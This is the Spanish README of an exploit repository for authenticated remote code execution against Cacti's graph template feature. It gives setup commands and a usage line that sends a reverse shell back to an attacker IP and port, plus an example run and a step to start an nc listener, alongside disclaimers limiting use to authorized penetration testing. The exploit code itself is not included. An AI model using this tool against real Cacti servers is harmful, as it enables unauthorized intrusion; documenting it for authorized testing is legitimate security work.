
Exploit de ejecución remota de código autenticado para la vulnerabilidad de plantilla de gráficos de Cacti, con payload de shell inversa y soporte de proxy para pruebas de penetración autorizadas.
Importante — Lee esto primero:
Este repositorio yexploit.pyse proporcionan solo con fines educativos y de investigación. No uses este código contra sistemas, redes o servicios para los cuales no tengas autorización explícita y por escrito. El acceso no autorizado a sistemas informáticos es ilegal y poco ético. Al usar este código aceptas cumplir con las leyes aplicables y las políticas institucionales.
python3 -m venv venv
source venv/bin/activate
pip install requests beautifulsoup4
python3 exploit.py -u <username> -p <password> -i <attacker_ip> -l <listener_port> -url <target_url> [--proxy]
Antes de ejecutar el script, asegúrate de tener un listener nc en funcionamiento. Ejecuta el script sin proxy a menos que estés depurando:
python3 exploit.py \
-u testuser \
-p Welcome1 \
-i 192.168.43.11 \
-l 4444 \
-url http://localhost
Recordatorio final: Este script y README son solo para uso educativo. Nunca uses estas herramientas para acceder a sistemas ilegalmente.